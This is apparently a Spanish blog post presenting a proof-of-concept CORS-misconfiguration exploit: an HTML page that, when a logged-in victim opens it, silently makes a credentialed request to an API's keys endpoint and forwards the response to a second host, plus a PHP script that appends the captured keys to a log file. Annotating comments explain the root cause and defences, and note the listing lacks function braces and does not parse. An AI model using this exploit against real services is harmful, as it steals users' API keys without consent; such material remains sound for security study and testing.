martes, 11 de junio de 2019

CORS Bypass 2 - Guardando Resultados en Archivo

<!DOCTYPE html> 
<html> 
<head> 
<script> 
// Proof of concept for a CORS misconfiguration on the API host; it is invoked
// from <body onload="hack();"> when a logged-in user opens this page.
// Flow, as written below:
//   1. a synchronous, credentialed POST to the API's /api/v1/keys endpoint;
//   2. on HTTP 200, the response body is shown in #demo and forwarded as the
//      form field "keys" to a second host.
// Step 2 can only happen if the API lets a foreign origin read a credentialed
// response, i.e. it answers with Access-Control-Allow-Origin set to the
// caller's origin together with Access-Control-Allow-Credentials: true.
// Browsers refuse the "*" wildcard for credentialed requests, so the usual root
// cause is a server that echoes the Origin request header back.
// Defender notes: compare Origin against an exact allow-list, send
// Allow-Credentials only to those origins, and look in API logs for requests
// to sensitive endpoints whose Origin header is not one of your own sites.
// NOTE(review): the braces that open and close the function body are missing
// in this listing (probably lost when the post was extracted); as shown it
// does not parse.
function hack() 

    var xmlhttp; 
    // Legacy fallback: ActiveXObject is for old Internet Explorer without a native XMLHttpRequest.
    if (window.XMLHttpRequest) 
      { 
          xmlhttp=new XMLHttpRequest(); 
      } 
        else 
      { 
          xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); 
      } 
        // Third argument false = synchronous request. A POST with no body and no
        // custom headers is a "simple" request, so no preflight is sent: the API
        // receives it regardless of its CORS policy, which only governs whether
        // this page may read the response. State-changing endpoints therefore
        // need CSRF protection independently of CORS.
        // NOTE(review): the host name looks like a redacted placeholder.
        xmlhttp.open("POST","http://api-xdxdxdxd/api/v1/keys",false); 
        // Asks the browser to attach the user's credentials for the API origin.
        // Cookies restricted with SameSite=Lax or Strict are not attached to a
        // cross-site request like this one, which is a useful second layer of defence.
        xmlhttp.withCredentials = true; 
        xmlhttp.send(null); 
    // Reached with a readable response only when the API's CORS headers allowed
    // this origin; otherwise the browser blocks access to the response.
    if(xmlhttp.status==200) 
    { 
        // Chained assignment: the response body is written into #demo as HTML and kept in str.
        var str = document.getElementById("demo").innerHTML = xmlhttp.responseText;
        // params has no var/let, so it is an implicit global.
        params = "keys="+str; 
        // Reuses the same XHR object to forward the captured body to the collecting endpoint.
        xmlhttp.open("POST","http://poc.xyz/poc_cors.php",false); 
        xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); 
        xmlhttp.setRequestHeader("Accept-Language","es-MX,es;q=0.8,en-US;q=0.5,en;q=0.3"); 
        xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); 
        xmlhttp.send(params); 
    } 

</script> 
</head> 
<body onload="hack();"> 
<div id="demo"></div>
</body> 
<?php
// Receiving side of the PoC: when the request carries a "keys" form field,
// its raw value is appended as one line to log.txt next to this script.
// NOTE(review): the listing shows this block inside the HTML page, but the
// script above posts to poc_cors.php, so it is presumably a separate file.
// What ends up in the log is the API's own response body, so for the API owner
// remediation means rotating the exposed keys as well as fixing the CORS policy.
if (isset($_POST['keys'])) {
    $captured = $_POST['keys'];
    // Mode "a" appends, creating the file if it does not exist yet.
    $log = fopen("log.txt", "a");
    fwrite($log, $captured . "\n");
    fclose($log);
}
?>
</html>
